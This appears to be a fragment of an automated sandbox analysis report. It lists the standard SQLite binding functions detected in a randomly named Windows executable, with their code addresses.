Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E1307A sqlite3_transfer_bindings, 0_2_61E1307A
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D5E6 sqlite3_bind_int64, 0_2_61E2D5E6
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D595 sqlite3_bind_double, 0_2_61E2D595
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E0B431 sqlite3_clear_bindings, 0_2_61E0B431
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E037F3 sqlite3_value_frombind, 0_2_61E037F3
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D781 sqlite3_bind_zeroblob64, 0_2_61E2D781
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D714 sqlite3_bind_zeroblob, 0_2_61E2D714
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D68C sqlite3_bind_pointer, 0_2_61E2D68C
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D65B sqlite3_bind_null, 0_2_61E2D65B
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D635 sqlite3_bind_int, 0_2_61E2D635
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D9B0 sqlite3_bind_value, 0_2_61E2D9B0
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D981 sqlite3_bind_text16, 0_2_61E2D981
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D945 sqlite3_bind_text64, 0_2_61E2D945
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D916 sqlite3_bind_text, 0_2_61E2D916
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D8E7 sqlite3_bind_blob64, 0_2_61E2D8E7
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E038CA sqlite3_bind_parameter_count, 0_2_61E038CA
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E158CA sqlite3_bind_parameter_index, 0_2_61E158CA
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E038DC sqlite3_bind_parameter_name, 0_2_61E038DC
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E2D8B8 sqlite3_bind_blob, 0_2_61E2D8B8